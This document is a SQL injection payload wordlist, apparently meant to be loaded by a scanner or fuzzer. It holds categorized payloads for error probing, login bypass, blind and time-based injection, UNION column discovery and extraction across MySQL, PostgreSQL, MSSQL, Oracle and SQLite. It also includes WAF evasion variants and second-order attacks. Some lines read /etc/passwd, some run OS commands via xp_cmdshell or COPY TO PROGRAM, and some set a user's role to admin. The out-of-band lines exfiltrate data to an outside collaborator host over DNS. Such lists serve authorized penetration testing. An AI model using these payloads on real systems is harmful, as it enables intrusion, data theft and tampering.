# SQL injection payloads — error-based, union, boolean blind, time-based, auth bypass
# Each line is a single payload. Lines starting with # are comments (ignored by loader).
# Categories: error, boolean, union, time, auth, second-order, oob

# --- Error-based probes ---
'
"
`
')
")
'))
\
''
""
`'

# --- Classic auth bypass ---
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#
' OR '1'='1'/*
' OR 1=1--
' OR 1=1#
" OR 1=1--
" OR 1=1#
admin'--
admin'#
admin'/*
admin' OR '1
' OR 'a'='a
')) OR 1=1--
1' OR '1'='1

# --- Boolean-based blind ---
' AND '1'='1
' AND '1'='2
' AND 1=1--
' AND 1=2--
1 AND 1=1
1 AND 1=2
1' AND SLEEP(0)--
1) AND 1=1--

# --- Time-based blind ---
'; WAITFOR DELAY '0:0:5'--
'; SELECT pg_sleep(5)--
'; SELECT SLEEP(5)--
' AND SLEEP(5)--
') AND SLEEP(5)--
'); SELECT pg_sleep(5)--
1); SELECT pg_sleep(5)--
' OR IF(1=1,SLEEP(5),0)--
'+(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)+'
1;SELECT pg_sleep(5);--

# --- UNION SELECT (generic column discovery) ---
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION ALL SELECT 1--
' UNION ALL SELECT 1,2--
' UNION ALL SELECT 1,2,3--
' UNION ALL SELECT 1,2,3,4--
' UNION ALL SELECT 1,2,3,4,5--
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
' ORDER BY 10--
' GROUP BY 1--

# --- Database fingerprinting via UNION ---
' UNION SELECT @@version--
' UNION SELECT version()--
' UNION SELECT banner FROM v$version--
' UNION SELECT sqlite_version()--
' UNION SELECT database(),current_user(),@@version--

# --- MySQL extraction ---
' UNION SELECT schema_name FROM information_schema.schemata--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT LOAD_FILE('/etc/passwd')--
' INTO OUTFILE '/tmp/out'--

# --- PostgreSQL extraction ---
' UNION SELECT table_name FROM information_schema.tables--
'; COPY (SELECT '') TO PROGRAM 'id'--
'; SELECT pg_read_file('/etc/passwd')--

# --- MSSQL extraction ---
'; EXEC xp_cmdshell('whoami')--
'; EXEC sp_configure 'show advanced options', 1--
' UNION SELECT name FROM sys.databases--

# --- Oracle extraction ---
' UNION SELECT banner FROM v$version--
' UNION SELECT table_name FROM all_tables--
' UNION SELECT name FROM v$datafile--

# --- SQLite extraction ---
' UNION SELECT sql FROM sqlite_master--
' UNION SELECT name FROM sqlite_master WHERE type='table'--

# --- OOB via DNS (requires interactsh-client or burp collaborator) ---
'; EXEC master..xp_dirtree '\\YOURCOLLAB.interact.sh\test'--
'; SELECT UTL_INADDR.GET_HOST_ADDRESS('yourcollab.interact.sh')--
'; COPY (SELECT '') TO PROGRAM 'nslookup yourcollab.interact.sh'--
' UNION SELECT LOAD_FILE(CONCAT('\\\\', (SELECT user()), '.yourcollab.interact.sh\\x'))--

# --- WAF bypass variants ---
'/**/OR/**/1=1--
'%09OR%091=1--
'%20OR%201=1--
'%0aOR%0a1=1--
'%0bOR%0b1=1--
'/*!50000OR*/1=1--
'/*!OR*/'1'='1
'%20/**/OR/**/1=1--
'+OR+'1'='1
'%2BOR%2B'1'%3D'1
UnIoN SeLeCt
'%55NION%53ELECT NULL,NULL--
'&#x27; OR 1=1--
'\u0055NION SELECT NULL--

# --- Second-order / stored ---
admin'/**/UNION/**/SELECT/**/username,password/**/FROM/**/users--
'; UPDATE users SET role='admin' WHERE id=1--
'; INSERT INTO logs VALUES ('pwned')--
